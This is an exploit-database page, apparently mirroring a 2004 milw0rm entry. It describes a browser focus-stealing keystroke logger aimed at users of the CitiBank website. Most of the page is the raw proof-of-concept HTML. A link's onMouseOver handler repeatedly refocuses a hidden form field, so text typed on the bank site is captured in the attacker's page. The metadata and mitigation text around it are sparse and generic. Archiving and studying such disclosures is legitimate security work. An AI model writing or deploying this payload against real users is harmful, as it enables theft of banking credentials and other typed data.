header-logo
Suggest Exploit
vendor:
by:
milw0rm.com
5.5
CVSS
MEDIUM
Keystroke Logging
778
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

Test Your Browser

This exploit allows an attacker to log the keystrokes entered by a user on the CitiBank website. By opening the provided link in a new tab and focusing on the form field, the attacker can capture the user's keystrokes.

Mitigation:

Users should avoid entering sensitive information on untrusted websites. Ensure that the website is legitimate and secure before entering any personal or financial data.
Source

Exploit-DB raw data:

<b>Test Your Browser</b><br> 
      <br> 
      Open the link below in a new tab, then try to type data into form fields on the CitiBank website.<br> 
      <br> 
      <a href="http://www.citibank.com/" onMouseOver="setInterval('document.myform.userinput.focus();', 10);">Open this Link in New Tab</a><br> 
      <br> 
      <form name="myform"> 
        <b>Result: (Keystrokes you pressed on the CitiBank website.)</b><br> 
        <textarea name="userinput" rows="3">&lt;/textarea&gt; 
      </form> 

// milw0rm.com [2004-10-22]

Navigation

Suggest Exploit

Services By CQR